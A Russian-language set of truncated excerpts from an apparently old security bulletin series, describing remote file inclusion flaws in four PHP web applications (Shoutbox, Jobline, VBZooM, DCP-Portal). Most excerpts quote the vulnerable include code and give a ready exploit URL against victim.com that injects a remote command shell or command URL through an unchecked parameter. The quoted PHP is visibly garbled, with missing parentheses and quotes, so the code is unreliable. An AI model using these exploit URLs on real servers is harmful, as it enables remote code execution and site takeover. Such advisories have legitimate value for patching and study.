Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в S H O U T B O X.
Компьютер для продвинутых пользователей В этом выпуске: S H O U T B O X ПО: S H O U T B O X Версия: 1.5 Уязвимость: Уязвимость заключается в возможности выполнять произвольный код на сервере. Код: $this_dir = str_replace, '/, dirname_FILE); include$this_dir/config.inc.php); if!isset$language) $language = 'en'; include$this_dir/lang$language.inc); include$this_dir/smilies.inc); Использование: http://www.victim.com/S H O U T B O X/shoutbox.inc.php?this_dir=Command-Shell Не забудьте проголосовать за выпуск! Р...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Jobline.
Компьютер для продвинутых пользователей В этом выпуске: Jobline ПО: Jobline Версия: 1.1.1 Уязвимость: Уязвимость заключается в возможности выполнять произвольный код на сервере. Код: if ( file_exists( $mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php" ) ) { include_once$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php); } else { include_once$mosConfig_absolute_path/components/$option/language/english.php); } Использование: http://www.victim.com/Jobline/admin.jo...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в VBZooM .
Компьютер для продвинутых пользователей В этом выпуске: VBZooM ПО: VBZooM Версия: 1.02 Использование: /meaning.php?Action=1...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в DCP-Portal.
Компьютер для продвинутых пользователей В этом выпуске: DCP-Portal ПО: DCP-Portal Версия: 6.1.х Уязвимость: Уязвимость заключается в возможности выполнить удаленную команду на сервере. Сам ошибочный код содержится в файле lib.php: include $root/library/lib_nav.php); include $root/library/lib_mods.php); include $root/library/lib_admin.php); include $root/library/lib_3rd.php); При этом переменная $root не проверяется. Использование: http://example/[dp_path]/library/lib.php?root[cmd_url] Не забудьте проголосо...